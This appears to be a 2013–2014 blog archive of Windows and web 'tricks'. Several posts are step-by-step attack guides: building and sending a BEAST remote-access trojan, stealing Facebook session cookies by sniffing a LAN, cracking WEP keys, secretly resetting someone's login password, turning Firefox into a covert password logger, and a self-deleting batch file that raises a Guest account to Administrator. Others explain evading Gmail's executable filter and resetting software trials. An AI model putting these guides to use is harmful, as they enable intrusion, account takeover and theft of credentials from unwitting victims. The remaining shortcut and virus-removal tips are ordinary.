Next
Previous
Showing posts with label tricks. Show all posts

Sunday, 8 June 2014

0

How to Login Multiple Skype Accounts at the same time..

Posted in ,

Step 1:Go to Skype installation path on your computer

Example: C:\Program Files\Skype\Phone

Step 2: Right Click on Skype.exe icon

Step 3:Select Send to –> Desktop(create shortcut)
Now it will create a Skype shortcut on your desktop

Step 4: Right Click on the Skype icon which you have newly created

Step 5: select Properties

Step 6:In target feild, at the end of the path give a space and followed by the text " /Secondary "

Wednesday, 4 June 2014

0

How to change friend's profile pictures ?

Posted in , , ,
STEP 1 : Login with your facebook account.
STEP 2 : Select the friend whose profile picture you
want to change.
STEP 3 : Select any photo from
facebook , open it and in the url of photo add "
&makeprofile=1 "
STEP 4 : Now send this url to the selected friend
along with
&makeprofile=1 at the end.
That's it.
Done when your friend click the link he will be
automatically redirected to
profile image cropping page , when your friend
crops the image his profile picture will be
automatically changed .
Make sure that your friend crops the image.

Sunday, 1 June 2014

0

How to Hack Victim PC Using BEAST TROJAN

Posted in ,
==========
NOTE:i'm nt responsible fr any damage
- download beast trojan google n install it
- unrar the pack
- Open The software you will get the screen
>>How to make a TROJAN using BEAST TROJAN :-
-----------------------------------------------------------------
1) Now Click on ” Build server ” button.
2) now click on notofication tab
3) In the notifications tab click on the e-mail button.
4) now fill ur proper email
5) Now Go to “AV-FW kill ” tab.
6) now put a tick mark on the ” disable XP firewall “.
7) Now Click on “EXE icon ” tab.
8) n now u can choose any icon for the file from the list or you
can browse the icon from the directory and can use it.
9) Now click on the ” Save Server ” button and the Trojan Will be made.
10) Now Send this Trojan File to victim.
11) As and when the victim will install the trojan on his system you will get a notification e-mail on your specified e-mail id while making the trojan. This Email consist of the IP address and port of the victim.
12) now put his ip address in a ''host colum" n put his port in "port colum"
13) After That Click on the “Go Beast ” Button and You will be connected to victims PC.
14) Now Select the action or task you want to execute on victims PC form the given list.
15) Now to destroy or kill the trojan click on the ” server ” tab from the menu.

Saturday, 31 May 2014

0

Cracking a Wifi (WEP) Password :-

Posted in , ,
========================
-METHOD 1 :: Getting Past a Log In Password.
----------------------------------------------------------------
1) Boot the computer in safe mode.
2) Click “Start”.
3) Click “Run”.
4) Type in “control userpasswords2”. [1]
5) Change passwords for any account.This is probably going to be obvious to the user, so you may have to tell them a little white lie. Try something along the lines of: "Oh, I hear computers glitch like that sometimes. You can always type in recoverpassword if you get locked out and then set a new
6) Reboot the computer.
-METHOD 2:: Getting Remote Access
--------------------------------------------------
1) Download the program LogMeIn. There is a free version, though you can purchase a subscription if that better meets your needs. [3]
*.The program will need to be downloaded to the computer you intend to remotely view or use. This makes it useful for gaining access to your computer if it is stolen or for checking up on your teen’s daytime activities during the summer.
*.You will have to make an account with the LogMeIn website in order to use the software.
2) Log in to the website.Log in to LogMeIn’s website.
3) Navigate to the “My Computers” page. It should open automatically when you sign in.
4) Add the computer you intend to remotely access.You will see an “Add computer” button on the page. Click that and fill in the info for the computer you intend to access.
5) Click the name for the computer once it’s added.
6) Log on to the computer.This means you’ll have to know the username and password for the account you’re trying to access or view.
7) Click “Remote Control”. If you’re trying to be sneaky (such as to spy on the user), try to move the mouse as little as possible and don’t click on anything.
8) Log out when you’re done.
-METHOD 3:: Cracking a Wifi (WEP) Password
------------------------------------------------------------
1) Download the necessary programs.You will need 2 programs to make this hack work: CommView (which will be used to look for vulnerabilities in the network you’re trying to access [4]) and AirCrackNG (which will break the security key itself)
*.Make sure your computer’s wireless adaptor is compatiblewith CommView.
2) Find a Network. Use CommView to scan for wireless networks. Choose a network with a WEP key and a decent signal.
3) Filter the search to that network. Right click on the network you
want to access, select “Copy MAC address”, go to the Rules tab, then MAC Addresses, enable MAC address rules, then click Action→Capture→Add Record→Both. Paste in the MAC address.
4) View Data packets.Sort out the Management (M) and Control (C ) packets so that you are only viewing the Data (D) packets.
5) Save the packets. Go to the Logging tab and enable auto saving. You may need to change the settings on the Directory size and File size. Try 2000 and 20, respectively.
6) Press the “Play” button to begin collecting. Wait until you have at least 100,000 packets.
7) Click “Concatenate Logs” under the Log tab. Make sure all of the logs are selected.
8) Export the logs. Go to the folder where the logs were saved and open the log file. Click File→Export→WireShark/tcpdump format and save it where you can find it easily.
9) Open the newly created file with Aircrack. Start Aircrack and choose WEP. Open the file and click “Launch”.
10) Enter the index number. When the command prompt opens, you’ll need to enter the index number for the target network. It is probably 1. Hit enter and wait. If it works, the key will be shown..!

Saturday, 24 May 2014

0

How to reset the trial period of software to work it lifetime?

Posted in
First uninstall the software and follow the steps.
*. After uninstalling software, OpenRUN(Windows key + R) and type regedit and hit Enter.
*. Now Registry Editor Window will appear and here navigate toHKEY_LOCAL_MACHINE­ \ SOFTWARE \ Your Software name from left pane of this window. If you find any Key name with your software name then just Delete that Key.
*. Similarly navigate toHKEY_CURRENT_USER \ Software \ Your Software name and if you find any key with your software name then just Delete it and close the Registry Editor window.
*. Again go to RUN and type %temp% and hit Enter.
*. Now Delete all the things in that folder. Don’t worry these are the temporary files and not necessary for your operating system.
*. Now go to C:\Users\your username here\AppData.Under AppData open all three folders"Local", "Local Low" and "Roaming”and check. Under these three folders if you find any folder or anything with your Software's name, just delete it.
*. Now Restart your PC and install the expired software and you can use it again for trial period."

Friday, 23 May 2014

0

Cookie Stealing Attack:

Posted in , ,
Hack Any
Account like Facebook ,Twitter ,
Gmail ,Hotmail ,Skype and yahoo
etc.
Using this method you can hack
Any Account like
Facebook ,Twitter ,
Gmail ,Hotmail ,Skype and yahoo
etc.
this works At
LAN(local Area Network) . its best
place to hack at university, cafe ,
public place where computer
are on one LAN simple Example WI-
Fi.
What is Cookies And how the use
of stealing
cookies? => Cookies are file’s that stored on
Any computer’s By any website
when a you visits them . the
cookie used by the web server to
check the
authenticate the Real user . like you
Enter Login in Facebook then a
unique string’s Generated and the
one copy saved in the web server
and other is saved on your
Browser as a Cookie file .
both are matched when you open
a Account.
so then finally we will start.
Step 1:
Download the Wire Shark and
install it.
Step 2:
Next open the wire shark and then
click on
interface.
Step 3:
Next choose a interface which is
received and
sending packet and click on start
Step 4:
Continue the sniffing for around
like 10 minutes.
Step 5:
After a maximum 10 minute stop
the sniffing by going to a capture
menu.
Step6:
its important step, now filter to
http. cookie contains “datr”. Then
filter the all search for http cookies
with a name of datr and there is
Facebook authentication’ s cookie.
Step 7:
Now click on it and then goto the
copy > Bytes
> Printable Text only
Step 8:
Now for next step you must have 3
thing,
1. Mozilla Firefox [browser]
2. Grease Monkey[add-on]
3. Cookie injector[code]
and then open facebook. com
make sure you are
not login
Step 9:
Press the button Alt C to bring up a
cookie
injector and then Simply paste in a
cookie value
into it.
Step 10
Now refresh your page so then
finally you Enter
the Victim Account.
0

CONVERT IMAGE FORMAT WITHOUT ANY INTERNET AND SOFTWARE

Posted in

STEPS:
1. click on start menu
2. search for cmd.exe
3. copy the image that you want to
convert on desktop.
4. now name that image as (im)
5. check it's format by going into
it's properties.
6. write this command in
command prompt :
cd desktop
copy /b im.(original format) "fi.
(final format)"
for example : if i have a image
name as im and it's format is png. i
wants to convert it into ico format,
then i has to write this command
in command prompt :
cd desktop
copy/b im.png "fi.ico"
it's over, command prompt will
change it's format into specified
format and save the file on
desktop.

Saturday, 17 May 2014

0

Delete an “Undeleteable” File

Posted in ,
Delete an “Undeleteable” File
Open a Command prompt window and leave it open.
Close all the open Programs.
Click Start,Run and enter TASKMGR.EXE.
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI(or undeletable file) is located in.
All the Command Prompt type DEL <filename> is the file you wish to delete.
Go back to Task Manger, click file,New task and enter EXPLORER.EXE to restart the GUI shell.
Clode Task Manger.
Open Task Manger.

Or

You can try this.
Open Notepad.exe.
Click File>Save As..>
Locate the folder where your undeletable file is..
Choose ‘All Files’ from the file type box.
Click once on the file you wanna delete so its name appears in the ‘filename’ box.
Put a “ at the start and end of the filename.
(the filename should have the extension of the undeletable file so it will overwrite it).
Click save.

It should ask you to overwrite the existing file, choose yes and you can delete it as normal.
0

Convert Mozilla Browser To Keylogger:

Posted in ,
Fact:
Whenever you login into any website using mozilla firefox browser it always ask’s
you whether you want to Save password or not for that website.

Trick:
We will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later.

The key-logger will work on the basis of a script that disables the Firefox browser to ask the user to save his password whenever he logins to a website. Thereby, allowing the Firefox to store his username and password combination automatically
without prompting the user.

Follow these steps to convert your firefox into a keylogger :

1. First and foremost, download the firefox keylogger script.

2. If you are a Windows user, then navigate to C:/Program Files/Mozilla
Firefox/Components and if you are using MAC, then navigate to Applications -> Right Click Firefox -> Show Package Contents -> Contents/MacOS/Components

3. In the downloaded rar file, you will find a script named as nsLoginManagerPrompter.js, simply extract and then copy and paste the file in the folder that is applicable to you.

4. Your Firefox keylogger is now ready and whenever anyone enters his username and password on any site,his/her details would be saved automatically which can be easily retrieved using Fire Password viewer!!!

Saturday, 26 April 2014

0

Create your own Anti-Virus in Notepad++

Posted in ,
Create your own Anti-Virus in Notepad++ … mind you this meant against low level macro viruses.
For other you should pull out the big guns
Type the following code into Notepad:
@ echo off
echo off turn off the active virus
taskkill / F / IM virusname1.exe / IM virusname2.exe
echo Deleting all of viruses based on size
for / RC: %% a in (*. exe) do if%% ~ za 157,184 equ del / A: HSRA “%% a”
echo deleting hidden virus
echo for drive c and subfolders
for / R C: %% a in (*. doc.exe) do del “%% a”
echo for drive d and subfolders
for / R D: %% a in (*. doc.exe) do del “%% a”
echo Unhide Document
cd / d c:
echo for drive C and subfolders
*. doc attrib-H-S-A / S
cd / d d:
echo for drive D and subfolders
*. doc attrib-H-S-A / S
exit
Save the file with bat extension, For example antivirus.bat. then go to command prompt and run the Notepad file
0

How to Remove Virus Through Command Prompt

Posted in ,
Virus could be a malicious program that may copy itself and infect your pc. These viruses will unfold via USB/flash drive or from one pc to different pc by few written codes. There area unit several antivirus software system out there to get rid of viruses from pc. however there area unit some viruses or suspicious files thatcan’t be removed by any antivirus software system. Some suspicious files like autorun.inf initiate all the viruses incomputer. These files should be removed for safe operation of your computer, as a result of they will causeknowledge loss, software system damages etc. Such viruses and files is removed by victimization cmd. during this article we’ll discuss a way to take away a plague victimization electronic communication. Following steps is wont to take away a plague victimization electronic communication from your pc.

Go to begin menu and kind “cmd” within the search box or Start>all programs>accessories>command prompt.
->Open the infected drive like write , g: to travel to G drive.
->Now kind dir/w/a . it’ll show all the files of the drive as well as hidden files.
-->Locate AUTORUN.INF or any Virus and different suspicious files within the directory.
->there was no virus in my drive thus solely autorun.inf is been highlighted.
->Type command attrib -r –a –s –h to get rid of attributes of corresponding file.
->Type del autorun.inf to delete autorun.inf file.
->Now kind del virus name.exe t delete it, eg : del newfolder.exe .
(You may delete viruses by victimization following steps:
->When you notice AN Autorun.inf file or the other uncommon .exe file simply rename it.
->Syntax for rename is (rename computer filename.extension new name , for example: (rename autorun.inf virus) to rename autorun.inf file. Here I even have renamed it by “virus”.
->Now you’ll be able to access the defected drive while not touching the virus.
->To delete the renamed file move to the defected drive and choose the file you renamed.
->(Now delete the harmful renamed files.)
->You have deleted that virus with success however typically virus resides within the Recycler folder.To find this folder:
->Type cd recycler command.
->Again kind dir/w/a to find all file of the folder.
->Identify malicious files and delete them victimization on top of commands.
->Follow the on top of steps rigorously and that i suppose this data is enough to get rid of a plague victimization electronic communication simply.
->Important: ensure that no different processes being running whereas activity these actions. better of luck.






0

How to Create more than one file with the same name in the Same Folder

Posted in
Hi guys today i wanna tell you how to create the different files of same name in the same folde.

-> Suppose you want to create a file of name "Anonymous".
->Save the name in the Data folder.
->Now if you want to create a file in DATA folder with Anonymous name.
->Now Just type the name of file again Anonymous then press Alt+0160.
->Now press the save button.
     That's it......................
->Now you have two files in the data folder with the Same name...........

Enjoy and Have a nice day.
0

Short cut for Windows operating system helpful for computer section

Posted in ,

***********************
1. Windows Logo (Display or hide the Start menu)
2. Windows Logo+BREAK (Display the System Properties dialog box)
3. Windows Logo+D (Display the desktop)
4. Windows Logo+M (Minimize all of the windows)
5. Windows Logo+SHIFT+M (Restore the minimized windows)
6. Windows Logo+E (Open My Computer)
7. Windows Logo+F (Search for a file or a folder)
8. CTRL+Windows Logo+F (Search for computers)
9. Windows Logo+F1 (Display Windows Help)
10. Windows Logo+ L (Lock the keyboard)
11. Windows Logo+R (Open the Run dialog box)
12. Windows Logo+U (Open Utility Manager)
13. Accessibility Keyboard Shortcuts
14. Right SHIFT for eight seconds (Switch Filter Keys either on or off)
15. Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
16. Left ALT+left SHIFT+NUM LOCK (Switch the Mouse Keys either on or off)
17. SHIFT five times (Switch the Sticky Keys either on or off)
18. NUM LOCK for five seconds (Switch the Toggle Keys either on or off)
19. Windows Logo +U (Open Utility Manager)
20. Windows Explorer Keyboard Shortcuts
21. END (Display the bottom of the active window)
22. HOME (Display the top of the active window)
23. NUM LOCK+Asterisk sign (*) (Display all of the sub folders that are under the selected folder)
24. NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
25. NUM LOCK+Minus sign (-) (Collapse the selected folder)
26. LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
27. RIGHT ARROW (Display the current selection if it is collapsed, or select the first sub-folder)

Sunday, 2 February 2014

0

HOW TO DISABLE USB PORT?

Posted in

Disable USB port:

1. Goto run

2. Type 'regedit' without quotes

3. Click on HKEY_LOCAL_MACHINE

4. goto SYSTEM

5. Click on CurrentControlSet

6. Click on services

7. Goto USBSTOR

8. Double click on 'Start' where value is 3

9. Now change the value data with 4

10. Now press ok and refresh your desktop your USB port is disabled, to enable the usb port replace the value 4 with 3

Saturday, 1 February 2014

0

How to Change the Displayed Name of the Processor in Windows 7, XP, and Vista

Posted in

Step One: Open up the Registry editor (RegEdit).
First, click Start, and search RegEdit (Windows 7/Vista). Open up regedit when the search has found it.

Step Two: On the left hand column in Registry Editor, open HKEY_LOCAL_MACHINE, under it,
open up: Hardware->DESCRIPTION->System->CentralProcess
or->1

Step Three: Now you can see a few lines of text on your right side in Registry Editor. Double-Click the one that is named "ProcessorNameString". A small box will pop-up, and you can change the processor's name to anything you like. After your done, press enter and close Registry Editor.

Step Four: Now we will see what we have changed under Windows.
Open Start, and Right-Click Computer, then click Properties in the Context Menu

Step Five: You can see your processor name changed to what ever you changed it to .

Troubleshooting: If the processor name did not change, Do step one, but on Step Two, instead of going into the number 1, go into number 0, and follow the rest of the Tutorial....................
0

HOW TO REMOVE SHORTCUT VIRUS?

Posted in ,
If your Pen Drive is infected with any of the following viruses:
* Autorun.inf
* new folder.exe
* Iexplorer.vbs
* Bha.vbs
* nfo.exe
* New_Folder.exe
* ravmon.exe
* RVHost.exe or any other files with extension.
Actually this viruses are hidden and can't be seen even after you enable show hidden folders.
Following simple dos command will change the attributes of these files ,there after you can remove it by pressing delete key.
Follow these steps:
Step1.:Type cmd in Run
Step2.: Switch to the drive on which pen drive is connected (like C:\> h: enter)
Step3.: type exactly as attrib -s -h *.* /s /d and hit enter (don't forget spaces).
Now you can see hidden virus files and you can delete them.
Done ENJOY.....!!!

Thursday, 28 November 2013

0

How to send .exe files via g-mail

Posted in , ,
We know that Gmail doesn't allow many of the .exe files to send via E-mail because they know many people will spam with that files. Here is the trick to send .exe files via G-mail.

As we all know that Gmail don't allow to send executable files. When user will try to send it, everything will work fine until sending it, but when user will click on send button it will display message as "hack.exe is an executable file. For security reasons, Gmail does not allow you to send this type of file." So
that means user can't send .exe files. I'm sharing one trick by which user can easily send any type of attachment through gmail. Follow these steps:

    Select file which you wanna to send. Suppose I selected hack.exe
    Now Go to Folder Option( Type control in run, then look for folder option).
    Go to view tab
    Uncheck, hide extensions for unknown file types. Apply & then Ok.
    Now rename the file hackerlov.exe with hackerlov.ex
    To receiver inform about changing extension & ask them to renamed it with .exe extension.
    That's all.

You can also send it via winzip or winrar, but some time Gmail scans internally in these files too.
If it scans internally too....then you can't  send them.

Tuesday, 26 November 2013

1

Hack Administrator from Guest

Posted in
Guys,
Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure.


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...


-----------------------------------------

ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.



EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Monday, 25 November 2013

0

G mail dot(.) trick fool any site

Posted in , ,
Friends may be you have suffered one or more time(s) that in any site you had signup with one g-mail account and if you want again to signup with the same email id you had used before in that site.... that site will not allow you to do so. Here is the trick ......


Its very useful trick, with that trick u Able create many account in One
Site,
read that!
if u Have only one G mail Id,
and u want to Reg. on any Site second time, and
They not Allowed One email two Times, then u
Use that Trick,
trick is that!
u add one or more dots(.) in old email id,
Suppose your old id is- anonymoustestid@gmail.com On next time u Use!
anonymous.testid@gmail.com,anonymous..testid@gmail.com,or just insert many dot(.)in your G mail id
with that Ur registration Success! and,
if u think!
"Which id we get Conformation mail" don't Worry u Get confirmation mail on Ur Real
id. :-)

We had tested it on two of online bookstore sites. It was succesful.

Friday, 22 November 2013

0

Have you ever transfered files between computers over a WI-FI????

Posted in ,
 
Hello friends today i want to share a simple trick to  transfer files through our WI-FI Router---->>>>>>>>

Transferring files from one computer to other can be a difficult if you do not have external storage media (Ex. External hard disk, Pen drive). People usually prefer LAN sharing. But there is a nice tool Any Send that can solve you problem. With this software utility, you can easily transfer files between two computers over Wi-Fi network. This is a cross-platform tool and supports Windows, Mac and Android. Notable thing about the tool is that there is no file size limit and transfer speed is good enough.
For transferring files from one system to other, you need to install this tool in both computer. After installation, it will add an icon to the Windows task bar (Menu bar in MAC). Now select files which you want to transfer and copy (CTRL + C) to clipboard. Now click on the task bar icon and select the computer to which you want to transfer files. 
On other system, it will ask the permission to accept the file. Accept the file and the file will be saved to the other system.

If you want to transfer folder, you do not need to zip it. Select folder, copy it and then select the other computer where you want to transfer file. Only thing you need to care is that all computers need to be connected to the same Wi-Fi network. The file transfer will happen instantly.
Download Any Send to your computer or phone